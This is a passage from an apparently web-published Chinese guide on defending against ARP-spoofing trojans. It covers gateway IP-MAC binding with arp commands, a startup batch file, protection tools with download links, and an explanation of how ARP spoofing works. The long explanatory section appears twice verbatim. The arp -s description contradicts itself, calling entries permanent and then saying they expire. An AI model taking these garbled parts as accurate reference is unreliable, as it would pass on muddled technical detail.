   在能正常上网时，进入MS-DOS窗口，输入命令：arp －a，查看网关的IP对应的正确MAC地址， 并将其记录下来。
   注意：如果已经不能上网，则先运行一次命令arp －d将arp缓存中的内容删空，计算机可暂时恢复上网（攻击如果不停止的话）。一旦能上网就立即将网络断掉（禁用网卡或拔掉网线），再运行arp －a。
   步骤二：
   如果计算机已经有网关的正确MAC地址，在不能上网只需手工将网关IP和正确的MAC地址绑定，即可确保计算机不再被欺骗攻击。
   要想手工绑定，可在MS-DOS窗口下运行以下命令：
   arp －s 网关IP 网关MAC
   例如：假设计算机所处网段的网关为192.168.1.1，本机地址为192.168.1.5，在计算机上运行arp －a后输出如下：
   Cocuments and Settings>arp -a
   Interface:192.168.1.5 --- 0x2
   Internet Address Physical Address Type
   192.168.1.1   00-01-02-03-04-05 dynamic
   其中，00-01-02-03-04-05就是网关192.168.1.1对应的MAC地址，类型是动态（dynamic）的，因此是可被改变的。
   被攻击后，再用该命令查看，就会发现该MAC已经被替换成攻击机器的MAC。如果希望能找出攻击机器，彻底根除攻击，可以在此时将该MAC记录下来，为以后查找该攻击的机器做准备。
   手工绑定的命令为：
   arp －s 192.168.1.1   00-01-02-03-04-05
   绑定完，可再用arp －a查看arp缓存：
   Cocuments and Settings>arp -a
   Interface: 192.168.1.5 --- 0x2
   Internet Address Physical Address Type
   192.168.1.1   00-01-02-03-04-05 static
   这时，类型变为静态（static），就不会再受攻击影响了。
   但是，需要说明的是，手工绑定在计算机关机重启后就会失效，需要再次重新绑定。所以，要彻底根除攻击，只有找出网段内被病毒感染的计算机，把病毒杀掉，才算是真正解决问题。

5 .作批处理文件
   在客户端做对网关的arp绑定，具体操作步骤如下：
   步骤一：
   查找本网段的网关地址，比如192．168．1．1，以下以此网关为例。在正常上网时，“开始→运行→cmd→确定”，输入：arp －a，点回车，查看网关对应的Physical Address。
比如：网关192.168.1.1 对应00－01－02－03－04－05。
   步骤二：
   编写一个批处理文件rarp.bat，内容如下：
   @echo off
   arp －d
   arp -s   192.168.1.1   00－01－02－03－04－05
   保存为：rarp.bat。
   步骤三：
   运行批处理文件将这个批处理文件拖到“Windows→开始→程序→启动”中，如果需要立即生效，请运行此文件。
   注意：以上配置需要在网络正常时进行

6.使用安全工具软件
   及时下载Anti ARP Sniffer软件保护本地计算机正常运行。具体使用方法可以在网上搜索。
   如果已有病毒计算机的MAC地址，可使用NBTSCAN等软件找出网段内与该MAC地址对应的IP，即感染病毒的计算机的IP地址，然后报告单位的网络中心对其进行查封。
   或者利用单位提供的集中网络防病毒系统来统一查杀木马。另外还可以利用木马杀客等安全工具进行查杀。

7.应急方案
   网络管理管理人员利用上面介绍的ARP木马检测方法在局域网的交换机上查出受感染该病毒的端口后，立即关闭中病毒的端口，通过端口查出相应的用户并通知其彻底查杀病毒。而后，做好单机防范，在其彻底查杀病毒后再开放相应的交换机端口，重新开通上网。
附录一
清华大学校园网络安全响应小组编的一个小程序
下载地址： ftp://166.111.8.243/tools/ArpFix.rar

清华大学校园网络安全响应小组编了一个小程序，它可以保护您的计算机在同一个局域网内部有ARP欺骗木马计算机的攻击时，保持正常上网。具体使用方法：
1、 程序运行后请先选择网卡，选定网卡后点击“选定”按钮。
2、 选定网卡后程序会自动获取您机器的网关地址。
3、获得网关地址后请点击获取MAC地址按钮获取正确的网关MAC地址。
4、 确认网关的MAC地址后请点击连接保护，程序开始保护您的机器。
5、 点击程序右上角的叉，程序自动隐藏到系统托盘内。
6、要完全退出程序请在系统托盘中该程序图标上点击右键选择EXIT。
注意：
1、这个程序只是一个ARP攻击保护程序，即受ARP木马攻击时保持自己计算机的MAC地址不被恶意篡改，从而在遭受攻击时网络不会中断。本程序并不能清除已经感染的ARP木马，要预防感染或杀除木马请您安装正版的杀毒软件！

附录二
Anti Arp Sniffer 的用法
下载地址：http://www.wipe.edu.cn/Files/wlzx/Antiarp.rar

双击Antiarp文件，出现图二所示对话框。

图二
输入网关地址（网关地址获取方式：[开始] -->[程序]--> [附件]菜单下调出“命令提示符”，输入ipconfig，其中Default Gateway即为网关地址）；点击获取网关MAC地址，点击自动防护保证当前网卡与网关的通信不被第三方监听。
点击恢复默认，然后点击防止地址冲突，如频繁的出现IP地址冲突，这说明攻击者频繁发送ARP欺骗数据包。

右击[我的电脑]-->[管理]-->点击[事件查看器]-->点击[系统]-->查看来源为[TcpIP]--->双击事件可以看到显示地址发生冲突，并记录了该MAC地址，请复制该MAC地址并填入Anti ARP Sniffer的本地MAC地址输入框中(请注意将:转换为-)，输入完成之后点击[防护地址冲突]，为了使MAC地址生效请禁用本地网卡然后再启用网卡，在CMD命令行中输入Ipconfig /all，查看当前MAC地址是否与本地MAC地址输入框中的MAC地址相符，如果成功将不再会显示地址冲突。
注：1、如果您想恢复默认MAC地址,请点击[恢复默认],为了使MAC地址生效请禁用本地网卡然后再启用网卡；本软件不支持多网卡，部分网卡可能更改MAC会无效

ARP
 我们知道，当我们在浏览器里面输入网址时，DNS服务器会自动把它解析为IP地址，浏览器实际上查找的是IP地址而不是网址。那么IP地址是如何转换为第二层物理地址（即MAC地址）的呢？在局域网中，这是通过ARP协议来完成的。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞。所以网管们应深入理解ARP协议。

一、什么是ARP协议

ARP协议是“Address Resolution Protocol”（地址解析协议）的缩写。在局域网中，网络中实际传输的是“帧”，帧里面是有目标主机的MAC地址的。在以太网中，一个主机要和另一个主机进行直接通信，必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢？它就是通过地址解析协议获得的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的顺利进行。

二、ARP协议的工作原理
在每台安装有TCP/IP协议的电脑里都有一个ARP缓存表，表里的IP地址与MAC地址是一一对应的，如附表所示。

附表

我们以主机A（192.168.1.5）向主机B（192.168.1.1）发送数据为例。当发送数据时，主机A会在自己的ARP缓存表中寻找是否有目标IP地址。如果找到了，也就知道了目标MAC地址，直接把目标MAC地址写入帧里面发送就可以了；如果在ARP缓存表中没有找到相对应的IP地址，主机A就会在网络上发送一个广播，目标MAC地址是“FF.FF.FF.FF.FF.FF”，这表示向同一网段内的所有主机发出这样的询问：“192.168.1.1的MAC地址是什么？”网络上其他主机并不响应ARP询问，只有主机B接收到这个帧时，才向主机A做出这样的回应：“192.168.1.1的MAC地址是00-aa-00-62-c6-09”。这样，主机A就知道了主机B的MAC地址，它就可以向主机B发送信息了。同时它还更新了自己的ARP缓存表，下次再向主机B发送信息时，直接从ARP缓存表里查找就可以了。ARP缓存表采用了老化机制，在一段时间内如果表中的某一行没有使用，就会被删除，这样可以大大减少ARP缓存表的长度，加快查询速度。
        ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。
ARP攻击主要是存在于局域网网络中，局域网中若有一个人感染ARP木马，则感染该ARP木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计算机的通信信息，并因此造成网内其它计算机的通信故障。

三、如何查看ARP缓存表

ARP缓存表是可以查看的，也可以添加和修改。在命令提示符下，输入“arp -a”就可以查看ARP缓存表中的内容了，如附图所示。

用“arp -d”命令可以删除ARP表中某一行的内容；用“arp -s”可以手动在ARP表中指定IP地址与MAC地址的对应。

四、ARP欺骗
其实，此起彼伏的瞬间掉线或大面积的断网大都是ARP欺骗在作怪。ARP欺骗攻击已经成了破坏网吧经营的罪魁祸首，是网吧老板和网管员的心腹大患。

从影响网络连接通畅的方式来看，ARP欺骗分为二种，一种是对路由器ARP表的欺骗；另一种是对内网PC的网关欺骗。

第一种ARP欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网MAC地址，并按照一定的频率不断进行，使真实的地址信息无法通过更新保存在路由器中，结果路由器的所有数据只能发送给错误的MAC地址，造成正常PC无法收到信息。第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关，让被它欺骗的PC向假网关发数据，而不是通过正常的路由器途径上网。在PC看来，就是上不了网了，“网络掉线了”。

一般来说，ARP欺骗攻击的后果非常严重，大多数情况下会造成大面积掉线。有些网管员对此不甚了解，出现故障时，认为PC没有问题，交换机没掉线的“本事”，电信也不承认宽带故障。而且如果第一种ARP欺骗发生时，只要重启路由器，网络就能全面恢复，那问题一定是在路由器了。为此，宽带路由器背了不少“黑锅”。

作为网吧路由器的厂家，对防范ARP欺骗不得已做了不少份内、份外的工作。一、在宽带路由器中把所有PC的IP-MAC输入到一个静态表中，这叫路由器IP-MAC绑定。二、力劝网管员在内网所有PC上设置网关的静态ARP信息，这叫PC机IP-MAC绑定。一般厂家要求两个工作都要做，称其为IP-MAC双向绑定。

显示和修改“地址解析协议”(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译表。该命令只有在安装了 TCP/IP 协议之后才可用。

    arp -a [inet_addr] [-N [if_addr]

    arp -d inet_addr [if_addr]

    arp -s inet_addr ether_addr [if_addr]

    参数

    -a

    通过询问 TCP/IP 显示当前 ARP 项。如果指定了 inet_addr，则只显示指定计算机的 IP 和物理地址。

    -g

    与 -a 相同。

    inet_addr

    以加点的十进制标记指定 IP 地址。

    -N

    显示由 if_addr 指定的网络界面 ARP 项。

    if_addr

    指定需要修改其地址转换表接口的 IP 地址（如果有的话）。如果不存在，将使用第一个可适用的接口。

    -d

    删除由 inet_addr 指定的项。

    -s

    在 ARP 缓存中添加项，将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物理地址由以连字符分隔的6 个十六进制字节给定。使用带点的十进制标记指定 IP 地址。项是永久性的，即在超时到期后项自动从缓存删除。

    ether_addr

    指定物理地址。

五、遭受ARP攻击后现象
   
       ARP欺骗木马的中毒现象表现为：使用局域网时会突然掉线，过一段时间后又会恢复正常。比如客户端状态频频变红，用户频繁断网，IE浏览器频繁出错，以及一些常用软件出现故障等。如果局域网中是通过身份认证上网的，会突然出现可认证，但不能上网的现象（无法ping通网关），重启机器或在MS-DOS窗口下运行命令arp -d后，又可恢复上网。
ARP欺骗木马只需成功感染一台电脑，就可能导致整个局域网都无法上网，严重的甚至可能带来整个网络的瘫痪。该木马发作时除了会导致同一局域网内的其他用户上网出现时断时续的现象外，还会窃取用户密码。如盗取QQ密码、盗取各种网络游戏密码和账号去做金钱交易，盗窃网上银行账号来做非法交易活动等，这是木马的惯用伎俩，给用户造成了很大的不便和巨大的经济损失。
 

ARP
 我们知道，当我们在浏览器里面输入网址时，DNS服务器会自动把它解析为IP地址，浏览器实际上查找的是IP地址而不是网址。那么IP地址是如何转换为第二层物理地址（即MAC地址）的呢？在局域网中，这是通过ARP协议来完成的。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞。所以网管们应深入理解ARP协议。

一、什么是ARP协议

ARP协议是“Address Resolution Protocol”（地址解析协议）的缩写。在局域网中，网络中实际传输的是“帧”，帧里面是有目标主机的MAC地址的。在以太网中，一个主机要和另一个主机进行直接通信，必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢？它就是通过地址解析协议获得的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的顺利进行。

二、ARP协议的工作原理
在每台安装有TCP/IP协议的电脑里都有一个ARP缓存表，表里的IP地址与MAC地址是一一对应的，如附表所示。

附表

我们以主机A（192.168.1.5）向主机B（192.168.1.1）发送数据为例。当发送数据时，主机A会在自己的ARP缓存表中寻找是否有目标IP地址。如果找到了，也就知道了目标MAC地址，直接把目标MAC地址写入帧里面发送就可以了；如果在ARP缓存表中没有找到相对应的IP地址，主机A就会在网络上发送一个广播，目标MAC地址是“FF.FF.FF.FF.FF.FF”，这表示向同一网段内的所有主机发出这样的询问：“192.168.1.1的MAC地址是什么？”网络上其他主机并不响应ARP询问，只有主机B接收到这个帧时，才向主机A做出这样的回应：“192.168.1.1的MAC地址是00-aa-00-62-c6-09”。这样，主机A就知道了主机B的MAC地址，它就可以向主机B发送信息了。同时它还更新了自己的ARP缓存表，下次再向主机B发送信息时，直接从ARP缓存表里查找就可以了。ARP缓存表采用了老化机制，在一段时间内如果表中的某一行没有使用，就会被删除，这样可以大大减少ARP缓存表的长度，加快查询速度。
        ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。
ARP攻击主要是存在于局域网网络中，局域网中若有一个人感染ARP木马，则感染该ARP木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计算机的通信信息，并因此造成网内其它计算机的通信故障。

三、如何查看ARP缓存表

ARP缓存表是可以查看的，也可以添加和修改。在命令提示符下，输入“arp -a”就可以查看ARP缓存表中的内容了，如附图所示。

用“arp -d”命令可以删除ARP表中某一行的内容；用“arp -s”可以手动在ARP表中指定IP地址与MAC地址的对应。

四、ARP欺骗
其实，此起彼伏的瞬间掉线或大面积的断网大都是ARP欺骗在作怪。ARP欺骗攻击已经成了破坏网吧经营的罪魁祸首，是网吧老板和网管员的心腹大患。

从影响网络连接通畅的方式来看，ARP欺骗分为二种，一种是对路由器ARP表的欺骗；另一种是对内网PC的网关欺骗。

第一种ARP欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网MAC地址，并按照一定的频率不断进行，使真实的地址信息无法通过更新保存在路由器中，结果路由器的所有数据只能发送给错误的MAC地址，造成正常PC无法收到信息。第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关，让被它欺骗的PC向假网关发数据，而不是通过正常的路由器途径上网。在PC看来，就是上不了网了，“网络掉线了”。

一般来说，ARP欺骗攻击的后果非常严重，大多数情况下会造成大面积掉线。有些网管员对此不甚了解，出现故障时，认为PC没有问题，交换机没掉线的“本事”，电信也不承认宽带故障。而且如果第一种ARP欺骗发生时，只要重启路由器，网络就能全面恢复，那问题一定是在路由器了。为此，宽带路由器背了不少“黑锅”。

作为网吧路由器的厂家，对防范ARP欺骗不得已做了不少份内、份外的工作。一、在宽带路由器中把所有PC的IP-MAC输入到一个静态表中，这叫路由器IP-MAC绑定。二、力劝网管员在内网所有PC上设置网关的静态ARP信息，这叫PC机IP-MAC绑定。一般厂家要求两个工作都要做，称其为IP-MAC双向绑定。

显示和修改“地址解析协议”(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译表。该命令只有在安装了 TCP/IP 协议之后才可用。

    arp -a [inet_addr] [-N [if_addr]

    arp -d inet_addr [if_addr]

    arp -s inet_addr ether_addr [if_addr]

    参数

    -a

    通过询问 TCP/IP 显示当前 ARP 项。如果指定了 inet_addr，则只显示指定计算机的 IP 和物理地址。

    -g

    与 -a 相同。

    inet_addr

    以加点的十进制标记指定 IP 地址。

    -N

    显示由 if_addr 指定的网络界面 ARP 项。

    if_addr

    指定需要修改其地址转换表接口的 IP 地址（如果有的话）。如果不存在，将使用第一个可适用的接口。

    -d

    删除由 inet_addr 指定的项。

    -s

    在 ARP 缓存中添加项，将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物理地址由以连字符分隔的6 个十六进制字节给定。使用带点的十进制标记指定 IP 地址。项是永久性的，即在超时到期后项自动从缓存删除。

    ether_addr

    指定物理地址。

五、遭受ARP攻击后现象
   
       ARP欺骗木马的中毒现象表现为：使用局域网时会突然掉线，过一段时间后又会恢复正常。比如客户端状态频频变红，用户频繁断网，IE浏览器频繁出错，以及一些常用软件出现故障等。如果局域网中是通过身份认证上网的，会突然出现可认证，但不能上网的现象（无法ping通网关），重启机器或在MS-DOS窗口下运行命令arp -d后，又可恢复上网。
ARP欺骗木马只需成功感染一台电脑，就可能导致整个局域网都无法上网，严重的甚至可能带来整个网络的瘫痪。该木马发作时除了会导致同一局域网内的其他用户上网出现时断时续的现象外，还会窃取用户密码。如盗取QQ密码、盗取各种网络游戏密码和账号去做金钱交易，盗窃网上银行账号来做非法交易活动等，这是木马的惯用伎俩，给用户造成了很大的不便和巨大的经济损失。